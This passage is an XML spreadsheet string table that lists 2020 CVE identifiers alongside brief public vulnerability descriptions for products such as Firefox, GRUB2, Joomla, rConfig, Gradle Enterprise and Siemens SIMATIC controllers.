    <t>JIT optimizations involving the Javascript arguments object could confuse later optimizations. This risk was already mitigated by various precautions in the code, resulting in this bug rated at only moderate severity. This vulnerability affects Firefox ESR &lt; 78.1, Firefox &lt; 79, and Thunderbird &lt; 78.1.</t>
  </si>
  <si>
    <t>CVE-2020-15657</t>
  </si>
  <si>
    <t>Firefox could be made to load attacker-supplied DLL files from the installation directory. This required an attacker that is already capable of placing files in the installation directory. *Note: This issue only affected Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Firefox ESR &lt; 78.1, Firefox &lt; 79, and Thunderbird &lt; 78.1.</t>
  </si>
  <si>
    <t>CVE-2020-15658</t>
  </si>
  <si>
    <t>The code for downloading files did not properly take care of special characters, which led to an attacker being able to cut off the file ending at an earlier position, leading to a different file type being downloaded than shown in the dialog. This vulnerability affects Firefox ESR &lt; 78.1, Firefox &lt; 79, and Thunderbird &lt; 78.1.</t>
  </si>
  <si>
    <t>CVE-2020-15659</t>
  </si>
  <si>
    <t>Mozilla developers and community members reported memory safety bugs present in Firefox 78 and Firefox ESR 78.0. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 79, Firefox ESR &lt; 68.11, Firefox ESR &lt; 78.1, Thunderbird &lt; 68.11, and Thunderbird &lt; 78.1.</t>
  </si>
  <si>
    <t>CVE-2020-1566</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1417, CVE-2020-1486.</t>
  </si>
  <si>
    <t>CVE-2020-15660</t>
  </si>
  <si>
    <t>Missing checks on Content-Type headers in geckodriver before 0.27.0 could lead to a CSRF vulnerability, that might, when paired with a specifically prepared request, lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-15661</t>
  </si>
  <si>
    <t>A rogue webpage could override the injected WKUserScript used by the logins autofill, this exploit could result in leaking a password for the current domain. This vulnerability affects Firefox for iOS &lt; 28.</t>
  </si>
  <si>
    <t>CVE-2020-15662</t>
  </si>
  <si>
    <t>A rogue webpage could override the injected WKUserScript used by the download feature, this exploit could result in the user downloading an unintended file. This vulnerability affects Firefox for iOS &lt; 28.</t>
  </si>
  <si>
    <t>CVE-2020-15663</t>
  </si>
  <si>
    <t>If Firefox is installed to a user-writable directory, the Mozilla Maintenance Service would execute updater.exe from the install location with system privileges. Although the Mozilla Maintenance Service does ensure that updater.exe is signed by Mozilla, the version could have been rolled back to a previous version which would have allowed exploitation of an older bug and arbitrary code execution with System Privileges. *Note: This issue only affected Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 80, Thunderbird &lt; 78.2, Thunderbird &lt; 68.12, Firefox ESR &lt; 68.12, and Firefox ESR &lt; 78.2.</t>
  </si>
  <si>
    <t>CVE-2020-15664</t>
  </si>
  <si>
    <t>By holding a reference to the eval() function from an about:blank window, a malicious webpage could have gained access to the InstallTrigger object which would allow them to prompt the user to install an extension. Combined with user confusion, this could result in an unintended or malicious extension being installed. This vulnerability affects Firefox &lt; 80, Thunderbird &lt; 78.2, Thunderbird &lt; 68.12, Firefox ESR &lt; 68.12, Firefox ESR &lt; 78.2, and Firefox for Android &lt; 80.</t>
  </si>
  <si>
    <t>CVE-2020-15665</t>
  </si>
  <si>
    <t>Firefox did not reset the address bar after the beforeunload dialog was shown if the user chose to remain on the page. This could have resulted in an incorrect URL being shown when used in conjunction with other unexpected browser behaviors. This vulnerability affects Firefox &lt; 80.</t>
  </si>
  <si>
    <t>CVE-2020-15666</t>
  </si>
  <si>
    <t>When trying to load a non-video in an audio/video context the exact status code (200, 302, 404, 500, 412, 403, etc.) was disclosed via the MediaError Message. This level of information leakage is inconsistent with the standardized onerror/onsuccess disclosure and can lead to inferring login status to services or device discovery on a local network among other attacks. This vulnerability affects Firefox &lt; 80 and Firefox for Android &lt; 80.</t>
  </si>
  <si>
    <t>CVE-2020-15667</t>
  </si>
  <si>
    <t>When processing a MAR update file, after the signature has been validated, an invalid name length could result in a heap overflow, leading to memory corruption and potentially arbitrary code execution. Within Firefox as released by Mozilla, this issue is only exploitable with the Mozilla-controlled signing key. This vulnerability affects Firefox &lt; 80.</t>
  </si>
  <si>
    <t>CVE-2020-15668</t>
  </si>
  <si>
    <t>A lock was missing when accessing a data structure and importing certificate information into the trust database. This vulnerability affects Firefox &lt; 80 and Firefox for Android &lt; 80.</t>
  </si>
  <si>
    <t>CVE-2020-15669</t>
  </si>
  <si>
    <t>When aborting an operation, such as a fetch, an abort signal may be deleted while alerting the objects to be notified. This results in a use-after-free and we presume that with enough effort it could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR &lt; 68.12 and Thunderbird &lt; 68.12.</t>
  </si>
  <si>
    <t>CVE-2020-1567</t>
  </si>
  <si>
    <t>CVE-2020-15670</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox for Android 79. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 80, Firefox ESR &lt; 78.2, Thunderbird &lt; 78.2, and Firefox for Android &lt; 80.</t>
  </si>
  <si>
    <t>CVE-2020-15671</t>
  </si>
  <si>
    <t>When typing in a password under certain conditions, a race may have occured where the InputContext was not being correctly set for the input field, resulting in the typed password being saved to the keyboard dictionary. This vulnerability affects Firefox for Android &lt; 80.</t>
  </si>
  <si>
    <t>CVE-2020-15673</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 80 and Firefox ESR 78.2. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 81, Thunderbird &lt; 78.3, and Firefox ESR &lt; 78.3.</t>
  </si>
  <si>
    <t>CVE-2020-15674</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 80. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 81.</t>
  </si>
  <si>
    <t>CVE-2020-15675</t>
  </si>
  <si>
    <t>When processing surfaces, the lifetime may outlive a persistent buffer leading to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox &lt; 81.</t>
  </si>
  <si>
    <t>CVE-2020-15676</t>
  </si>
  <si>
    <t>Firefox sometimes ran the onload handler for SVG elements that the DOM sanitizer decided to remove, resulting in JavaScript being executed after pasting attacker-controlled data into a contenteditable element. This vulnerability affects Firefox &lt; 81, Thunderbird &lt; 78.3, and Firefox ESR &lt; 78.3.</t>
  </si>
  <si>
    <t>CVE-2020-15677</t>
  </si>
  <si>
    <t>By exploiting an Open Redirect vulnerability on a website, an attacker could have spoofed the site displayed in the download file dialog to show the original site (the one suffering from the open redirect) rather than the site the file was actually downloaded from. This vulnerability affects Firefox &lt; 81, Thunderbird &lt; 78.3, and Firefox ESR &lt; 78.3.</t>
  </si>
  <si>
    <t>CVE-2020-15678</t>
  </si>
  <si>
    <t>When recursing through graphical layers while scrolling, an iterator may have become invalid, resulting in a potential use-after-free. This occurs because the function APZCTreeManager::ComputeClippedCompositionBounds did not follow iterator invalidation rules. This vulnerability affects Firefox &lt; 81, Thunderbird &lt; 78.3, and Firefox ESR &lt; 78.3.</t>
  </si>
  <si>
    <t>CVE-2020-1568</t>
  </si>
  <si>
    <t>CVE-2020-15680</t>
  </si>
  <si>
    <t>If a valid external protocol handler was referenced in an image tag, the resulting broken image size could be distinguished from a broken image size of a non-existent protocol handler. This allowed an attacker to successfully probe whether an external protocol handler was registered. This vulnerability affects Firefox &lt; 82.</t>
  </si>
  <si>
    <t>CVE-2020-15681</t>
  </si>
  <si>
    <t>When multiple WASM threads had a reference to a module, and were looking up exported functions, one WASM thread could have overwritten another's entry in a shared stub table, resulting in a potentially exploitable crash. This vulnerability affects Firefox &lt; 82.</t>
  </si>
  <si>
    <t>CVE-2020-15682</t>
  </si>
  <si>
    <t>When a link to an external protocol was clicked, a prompt was presented that allowed the user to choose what application to open it in. An attacker could induce that prompt to be associated with an origin they didn't control, resulting in a spoofing attack. This was fixed by changing external protocol prompts to be tab-modal while also ensuring they could not be incorrectly associated with a different origin. This vulnerability affects Firefox &lt; 82.</t>
  </si>
  <si>
    <t>CVE-2020-15683</t>
  </si>
  <si>
    <t>Mozilla developers and community members reported memory safety bugs present in Firefox 81 and Firefox ESR 78.3. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR &lt; 78.4, Firefox &lt; 82, and Thunderbird &lt; 78.4.</t>
  </si>
  <si>
    <t>CVE-2020-15684</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 81. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 82.</t>
  </si>
  <si>
    <t>CVE-2020-15687</t>
  </si>
  <si>
    <t>Missing access control restrictions in the Hypervisor component of the ACRN Project (v2.0 and v1.6.1) allow a malicious entity, with root access in the Service VM userspace, to abuse the PCIe assign/de-assign Hypercalls via crafted ioctls and payloads. This attack results in a corrupt state and Denial of Service (DoS) for previously assigned PCIe devices to the Service VM at runtime.</t>
  </si>
  <si>
    <t>CVE-2020-15688</t>
  </si>
  <si>
    <t>The HTTP Digest Authentication in the GoAhead web server before 5.1.2 does not completely protect against replay attacks. This allows an unauthenticated remote attacker to bypass authentication via capture-replay if TLS is not used to protect the underlying communication channel.</t>
  </si>
  <si>
    <t>CVE-2020-15689</t>
  </si>
  <si>
    <t>Appweb before 7.2.2 and 8.x before 8.1.0, when built with CGI support, mishandles an HTTP request with a Range header that lacks an exact range. This may result in a NULL pointer dereference and cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-1569</t>
  </si>
  <si>
    <t>CVE-2020-15690</t>
  </si>
  <si>
    <t>In Nim before 1.2.6, the standard library asyncftpclient lacks a check for whether a message contains a newline character.</t>
  </si>
  <si>
    <t>CVE-2020-15692</t>
  </si>
  <si>
    <t>In Nim 1.2.4, the standard library browsers mishandles the URL argument to browsers.openDefaultBrowser. This argument can be a local file path that will be opened in the default explorer. An attacker can pass one argument to the underlying open command to execute arbitrary registered system commands.</t>
  </si>
  <si>
    <t>CVE-2020-15693</t>
  </si>
  <si>
    <t>In Nim 1.2.4, the standard library httpClient is vulnerable to a CR-LF injection in the target URL. An injection is possible if the attacker controls any part of the URL provided in a call (such as httpClient.get or httpClient.post), the User-Agent header value, or custom HTTP header names or values.</t>
  </si>
  <si>
    <t>CVE-2020-15694</t>
  </si>
  <si>
    <t>In Nim 1.2.4, the standard library httpClient fails to properly validate the server response. For example, httpClient.get().contentLength() does not raise any error if a malicious server provides a negative Content-Length.</t>
  </si>
  <si>
    <t>CVE-2020-15695</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! through 3.9.19. A missing token check in the remove request section of com_privacy causes a CSRF vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-15696</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! through 3.9.19. Lack of input filtering and escaping allows XSS attacks in mod_random_image.</t>
  </si>
  <si>
    <t>CVE-2020-15697</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! through 3.9.19. Internal read-only fields in the User table class could be modified by users.</t>
  </si>
  <si>
    <t>CVE-2020-15698</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! through 3.9.19. Inadequate filtering on the system information screen could expose Redis or proxy credentials</t>
  </si>
  <si>
    <t>CVE-2020-15699</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! through 3.9.19. Missing validation checks on the usergroups table object can result in a broken site configuration.</t>
  </si>
  <si>
    <t>CVE-2020-1570</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1380, CVE-2020-1555.</t>
  </si>
  <si>
    <t>CVE-2020-15700</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! through 3.9.19. A missing token check in the ajax_install endpoint of com_installer causes a CSRF vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-15701</t>
  </si>
  <si>
    <t>An unhandled exception in check_ignored() in apport/report.py can be exploited by a local attacker to cause a denial of service. If the mtime attribute is a string value in apport-ignore.xml, it will trigger an unhandled exception, resulting in a crash. Fixed in 2.20.1-0ubuntu2.24, 2.20.9-0ubuntu7.16, 2.20.11-0ubuntu27.6.</t>
  </si>
  <si>
    <t>CVE-2020-15702</t>
  </si>
  <si>
    <t>TOCTOU Race Condition vulnerability in apport allows a local attacker to escalate privileges and execute arbitrary code. An attacker may exit the crashed process and exploit PID recycling to spawn a root process with the same PID as the crashed process, which can then be used to escalate privileges. Fixed in 2.20.1-0ubuntu2.24, 2.20.9 versions prior to 2.20.9-0ubuntu7.16 and 2.20.11 versions prior to 2.20.11-0ubuntu27.6. Was ZDI-CAN-11234.</t>
  </si>
  <si>
    <t>CVE-2020-15703</t>
  </si>
  <si>
    <t>There is no input validation on the Locale property in an apt transaction. An unprivileged user can supply a full path to a writable directory, which lets aptd read a file as root. Having a symlink in place results in an error message if the file exists, and no error otherwise. This way an unprivileged user can check for the existence of any files on the system as root.</t>
  </si>
  <si>
    <t>CVE-2020-15704</t>
  </si>
  <si>
    <t>The modprobe child process in the ./debian/patches/load_ppp_generic_if_needed patch file incorrectly handled module loading. A local non-root attacker could exploit the MODPROBE_OPTIONS environment variable to read arbitrary root files. Fixed in 2.4.5-5ubuntu1.4, 2.4.5-5.1ubuntu2.3+esm2, 2.4.7-1+2ubuntu1.16.04.3, 2.4.7-2+2ubuntu1.3, 2.4.7-2+4.1ubuntu5.1, 2.4.7-2+4.1ubuntu6. Was ZDI-CAN-11504.</t>
  </si>
  <si>
    <t>CVE-2020-15705</t>
  </si>
  <si>
    <t>GRUB2 fails to validate kernel signature when booted directly without shim, allowing secure boot to be bypassed. This only affects systems where the kernel signing certificate has been imported directly into the secure boot database and the GRUB image is booted directly without the use of shim. This issue affects GRUB2 version 2.04 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-15706</t>
  </si>
  <si>
    <t>GRUB2 contains a race condition in grub_script_function_create() leading to a use-after-free vulnerability which can be triggered by redefining a function whilst the same function is already executing, leading to arbitrary code execution and secure boot restriction bypass. This issue affects GRUB2 version 2.04 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-15707</t>
  </si>
  <si>
    <t>Integer overflows were discovered in the functions grub_cmd_initrd and grub_initrd_init in the efilinux component of GRUB2, as shipped in Debian, Red Hat, and Ubuntu (the functionality is not included in GRUB2 upstream), leading to a heap-based buffer overflow. These could be triggered by an extremely large number of arguments to the initrd command on 32-bit architectures, or a crafted filesystem with very large files on any architecture. An attacker could use this to execute arbitrary code and bypass UEFI Secure Boot restrictions. This issue affects GRUB2 version 2.04 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-15708</t>
  </si>
  <si>
    <t>Ubuntu's packaging of libvirt in 20.04 LTS created a control socket with world read and write permissions. An attacker could use this to overwrite arbitrary files or execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-15709</t>
  </si>
  <si>
    <t>Versions of add-apt-repository before 0.98.9.2, 0.96.24.32.14, 0.96.20.10, and 0.92.37.8ubuntu0.1~esm1, printed a PPA (personal package archive) description to the terminal as-is, which allowed PPA owners to provide ANSI terminal escapes to modify terminal contents in unexpected ways.</t>
  </si>
  <si>
    <t>CVE-2020-1571</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Setup in the way it handles permissions.A locally authenticated attacker could run arbitrary code with elevated system privileges, aka 'Windows Setup Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15710</t>
  </si>
  <si>
    <t>Potential double free in Bluez 5 module of PulseAudio could allow a local attacker to leak memory or crash the program. The modargs variable may be freed twice in the fail condition in src/modules/bluetooth/module-bluez5-device.c and src/modules/bluetooth/module-bluez5-device.c. Fixed in 1:8.0-0ubuntu3.14.</t>
  </si>
  <si>
    <t>CVE-2020-15711</t>
  </si>
  <si>
    <t>In MISP before 2.4.129, setting a favourite homepage was not CSRF protected.</t>
  </si>
  <si>
    <t>CVE-2020-15712</t>
  </si>
  <si>
    <t>rConfig 3.9.5 could allow a remote authenticated attacker to traverse directories on the system. An attacker could send a crafted request to the ajaxGetFileByPath.php script containing hexadecimal encoded "dot dot" sequences (%2f..%2f) in the path parameter to view arbitrary files on the system.</t>
  </si>
  <si>
    <t>CVE-2020-15713</t>
  </si>
  <si>
    <t>rConfig 3.9.5 is vulnerable to SQL injection. A remote authenticated attacker could send crafted SQL statements to the devices.php script using the sortBy parameter, which could allow the attacker to view, add, modify, or delete information in the back-end database.</t>
  </si>
  <si>
    <t>CVE-2020-15714</t>
  </si>
  <si>
    <t>rConfig 3.9.5 is vulnerable to SQL injection. A remote authenticated attacker could send crafted SQL statements to the devices.crud.php script using the custom_Location parameter, which could allow the attacker to view, add, modify, or delete information in the back-end database.</t>
  </si>
  <si>
    <t>CVE-2020-15715</t>
  </si>
  <si>
    <t>rConfig 3.9.5 could allow a remote authenticated attacker to execute arbitrary code on the system, because of an error in the search.crud.php script. An attacker could exploit this vulnerability using the nodeId parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15716</t>
  </si>
  <si>
    <t>RosarioSIS 6.7.2 is vulnerable to XSS, caused by improper validation of user-supplied input by the Preferences.php script. A remote attacker could exploit this vulnerability using the tab parameter in a crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-15717</t>
  </si>
  <si>
    <t>RosarioSIS 6.7.2 is vulnerable to XSS, caused by improper validation of user-supplied input by the Search.inc.php script. A remote attacker could exploit this vulnerability using the advanced parameter in a crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-15718</t>
  </si>
  <si>
    <t>RosarioSIS 6.7.2 is vulnerable to XSS, caused by improper validation of user-supplied input by the PrintSchedules.php script. A remote attacker could exploit this vulnerability using the include_inactive parameter in a crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-15719</t>
  </si>
  <si>
    <t>libldap in certain third-party OpenLDAP packages has a certificate-validation flaw when the third-party package is asserting RFC6125 support. It considers CN even when there is a non-matching subjectAltName (SAN). This is fixed in, for example, openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.</t>
  </si>
  <si>
    <t>CVE-2020-15720</t>
  </si>
  <si>
    <t>In Dogtag PKI through 10.8.3, the pki.client.PKIConnection class did not enable python-requests certificate validation. Since the verify parameter was hard-coded in all request functions, it was not possible to override the setting. As a result, tools making use of this class, such as the pki-server command, may have been vulnerable to Person-in-the-Middle attacks in certain non-localhost use cases. This is fixed in 10.9.0-b1.</t>
  </si>
  <si>
    <t>CVE-2020-15721</t>
  </si>
  <si>
    <t>RosarioSIS through 6.8-beta allows modules/Custom/NotifyParents.php XSS because of the href attributes for AddStudents.php and User.php.</t>
  </si>
  <si>
    <t>CVE-2020-15722</t>
  </si>
  <si>
    <t>In version 12.1.0.1004 and below of 360 Total Security,when TPI calls the browser process, there exists a local privilege escalation vulnerability. An attacker who could exploit DLL hijacking could execute arbitrary code on the Local system.</t>
  </si>
  <si>
    <t>CVE-2020-15723</t>
  </si>
  <si>
    <t>In the version 12.1.0.1004 and below of 360 Total Security, when the main process of 360 Total Security calls GameChrome.exe, there exists a local privilege escalation vulnerability. An attacker who could exploit DLL hijacking to bypass the hips could execute arbitrary code on the Local system.</t>
  </si>
  <si>
    <t>CVE-2020-15724</t>
  </si>
  <si>
    <t>In the version 12.1.0.1005 and below of 360 Total Security, when the Gamefolde calls GameChrome.exe, there exists a local privilege escalation vulnerability. An attacker who could exploit DLL hijacking to bypass the hips could execute arbitrary code on the Local system.</t>
  </si>
  <si>
    <t>CVE-2020-1573</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1580.</t>
  </si>
  <si>
    <t>CVE-2020-15731</t>
  </si>
  <si>
    <t>An improper Input Validation vulnerability in the code handling file renaming and recovery in Bitdefender Engines allows an attacker to write an arbitrary file in a location hardcoded in a specially-crafted malicious file name. This issue affects: Bitdefender Engines versions prior to 7.85448.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-15732</t>
  </si>
  <si>
    <t>Improper Certificate Validation vulnerability in the Online Threat Prevention module as used in Bitdefender Total Security allows an attacker to potentially bypass HTTP Strict Transport Security (HSTS) checks. This issue affects: Bitdefender Total Security versions prior to 25.0.7.29. Bitdefender Internet Security versions prior to 25.0.7.29. Bitdefender Antivirus Plus versions prior to 25.0.7.29.</t>
  </si>
  <si>
    <t>CVE-2020-15733</t>
  </si>
  <si>
    <t>An Origin Validation Error vulnerability in the SafePay component of Bitdefender Antivirus Plus allows a web resource to misrepresent itself in the URL bar. This issue affects: Bitdefender Antivirus Plus versions prior to 25.0.7.29.</t>
  </si>
  <si>
    <t>CVE-2020-15734</t>
  </si>
  <si>
    <t>An Origin Validation Error vulnerability in Bitdefender Safepay allows an attacker to manipulate the browser's file upload capability into accessing other files in the same directory or sub-directories. This issue affects: Bitdefender Safepay versions prior to 25.0.7.29.</t>
  </si>
  <si>
    <t>CVE-2020-1574</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka 'Microsoft Windows Codecs Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1560, CVE-2020-1585.</t>
  </si>
  <si>
    <t>CVE-2020-15744</t>
  </si>
  <si>
    <t>Stack-based Buffer Overflow vulnerability in the ONVIF server component of Victure PC420 smart camera allows an attacker to execute remote code on the target device. This issue affects: Victure PC420 firmware version 1.2.2 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-1575</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1198, CVE-2020-1227, CVE-2020-1345, CVE-2020-1482, CVE-2020-1514.</t>
  </si>
  <si>
    <t>CVE-2020-1576</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1200, CVE-2020-1210, CVE-2020-1452, CVE-2020-1453, CVE-2020-1595.</t>
  </si>
  <si>
    <t>CVE-2020-15767</t>
  </si>
  <si>
    <t>An issue was discovered in Gradle Enterprise before 2020.2.5. The cookie used to convey the CSRF prevention token is not annotated with the “secure” attribute, which allows an attacker with the ability to MITM plain HTTP requests to obtain it, if the user mistakenly uses a HTTP instead of HTTPS address to access the server. This cookie value could then be used to perform CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-15768</t>
  </si>
  <si>
    <t>An issue was discovered in Gradle Enterprise 2017.3 - 2020.2.4 and Gradle Enterprise Build Cache Node 1.0 - 9.2. Unrestricted HTTP header reflection in Gradle Enterprise allows remote attackers to obtain authentication cookies, if they are able to discover a separate XSS vulnerability. This potentially allows an attacker to impersonate another user. Gradle Enterprise affected application request paths:/info/headers, /cache-info/headers, /admin-info/headers, /distribution-broker-info/headers. Gradle Enterprise Build Cache Node affected application request paths:/cache-node-info/headers.</t>
  </si>
  <si>
    <t>CVE-2020-15769</t>
  </si>
  <si>
    <t>An issue was discovered in Gradle Enterprise 2020.2 - 2020.2.4. An XSS issue exists via the request URL.</t>
  </si>
  <si>
    <t>CVE-2020-1577</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory, aka 'DirectWrite Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15770</t>
  </si>
  <si>
    <t>An issue was discovered in Gradle Enterprise 2018.5. An attacker can potentially make repeated attempts to guess a local user's password, due to lack of lock-out after excessive failed logins.</t>
  </si>
  <si>
    <t>CVE-2020-15771</t>
  </si>
  <si>
    <t>An issue was discovered in Gradle Enterprise 2018.2 and Gradle Enterprise Build Cache Node 4.1. Cross-site transmission of cookie containing CSRF token allows remote attacker to bypass CSRF mitigation.</t>
  </si>
  <si>
    <t>CVE-2020-15772</t>
  </si>
  <si>
    <t>An issue was discovered in Gradle Enterprise 2018.5 - 2020.2.4. When configuring Gradle Enterprise to integrate with a SAML identity provider, an XML metadata file can be uploaded by an administrator. The server side processing of this file dereferences XML External Entities (XXE), allowing a remote attacker with administrative access to perform server side request forgery.</t>
  </si>
  <si>
    <t>CVE-2020-15773</t>
  </si>
  <si>
    <t>An issue was discovered in Gradle Enterprise before 2020.2.4. Because of unrestricted cross-origin requests to read-only data in the Export API, an attacker can access data as a user (for the duration of the browser session) after previously explicitly authenticating with the API.</t>
  </si>
  <si>
    <t>CVE-2020-15774</t>
  </si>
  <si>
    <t>An issue was discovered in Gradle Enterprise 2018.5 - 2020.2.4. An attacker with physical access to the browser of a user who has recently logged in to Gradle Enterprise and since closed their browser could reopen their browser to access Gradle Enterprise as that user.</t>
  </si>
  <si>
    <t>CVE-2020-15775</t>
  </si>
  <si>
    <t>An issue was discovered in Gradle Enterprise 2017.1 - 2020.2.4. The /usage page of Gradle Enterprise conveys high level build information such as project names and build counts over time. This page is incorrectly viewable anonymously.</t>
  </si>
  <si>
    <t>CVE-2020-15776</t>
  </si>
  <si>
    <t>An issue was discovered in Gradle Enterprise 2018.2 - 2020.2.4. The CSRF prevention token is stored in a request cookie that is not annotated as HttpOnly. An attacker with the ability to execute arbitrary code in a user's browser could impose an arbitrary value for this token, allowing them to perform cross-site request forgery.</t>
  </si>
  <si>
    <t>CVE-2020-15777</t>
  </si>
  <si>
    <t>An issue was discovered in the Maven Extension plugin before 1.6 for Gradle Enterprise. The extension uses a socket connection to send serialized Java objects. Deserialization is not restricted to an allow-list, thus allowing an attacker to achieve code execution via a malicious deserialization gadget chain. The socket is not bound exclusively to localhost. The port this socket is assigned to is randomly selected and is not intentionally exposed to the public (either by design or documentation). This could potentially be used to achieve remote code execution and local privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-15778</t>
  </si>
  <si>
    <t>** DISPUTED ** scp in OpenSSH through 8.3p1 allows command injection in the scp.c toremote function, as demonstrated by backtick characters in the destination argument. NOTE: the vendor reportedly has stated that they intentionally omit validation of "anomalous argument transfers" because that could "stand a great chance of breaking existing workflows."</t>
  </si>
  <si>
    <t>CVE-2020-15779</t>
  </si>
  <si>
    <t>A Path Traversal issue was discovered in the socket.io-file package through 2.0.31 for Node.js. The socket.io-file::createFile message uses path.join with ../ in the name option, and the uploadDir and rename options determine the path.</t>
  </si>
  <si>
    <t>CVE-2020-1578</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass, aka 'Windows Kernel Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15780</t>
  </si>
  <si>
    <t>An issue was discovered in drivers/acpi/acpi_configfs.c in the Linux kernel before 5.7.7. Injection of malicious ACPI tables via configfs could be used by attackers to bypass lockdown and secure boot restrictions, aka CID-75b0cea7bf30.</t>
  </si>
  <si>
    <t>CVE-2020-15781</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SICAM WEB firmware for SICAM A8000 RTUs (All versions &lt; V05.30). The login screen does not sufficiently sanitize input, which enables an attacker to generate specially crafted log messages. If an unsuspecting victim views the log messages via the web browser, these log messages might be interpreted and executed as code by the web application. This Cross-Site-Scripting (XSS) vulnerability might compromize the confidentiality, integrity and availability of the web application.</t>
  </si>
  <si>
    <t>CVE-2020-15782</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC Drive Controller family (All versions &lt; V2.9.2), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants) (All versions), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions &lt; V21.9), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions &lt; V4.5.0), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIPLUS variants) (All versions &lt; V2.9.2), SIMATIC S7-1500 Software Controller (All versions &lt; V21.9), SIMATIC S7-PLCSIM Advanced (All versions &lt; V4.0), SINAMICS PERFECT HARMONY GH180 Drives (Drives manufactured before 2021-08-13), SINUMERIK MC (All versions &lt; V6.15), SINUMERIK ONE (All versions &lt; V6.15). Affected devices are vulnerable to a memory protection bypass through a specific operation. A remote unauthenticated attacker with network access to port 102/tcp could potentially write arbitrary data and code to protected memory areas or read sensitive data to launch further attacks.</t>
  </si>
  <si>
    <t>CVE-2020-15783</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC S7-300 CPU family (incl. related ET200 CPUs and SIPLUS variants) (All versions), SIMATIC TDC CPU555 (All versions), SINUMERIK 840D sl (All versions). Sending multiple specially crafted packets to the affected devices could cause a Denial-of-Service on port 102. A cold restart is required to recover the service.</t>
  </si>
  <si>
    <t>CVE-2020-15784</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Spectrum Power 4 (All versions &lt; V4.70 SP8). Insecure storage of sensitive information in the configuration files could allow the retrieval of user names.</t>
  </si>
  <si>
    <t>CVE-2020-15785</t>
  </si>
  <si>
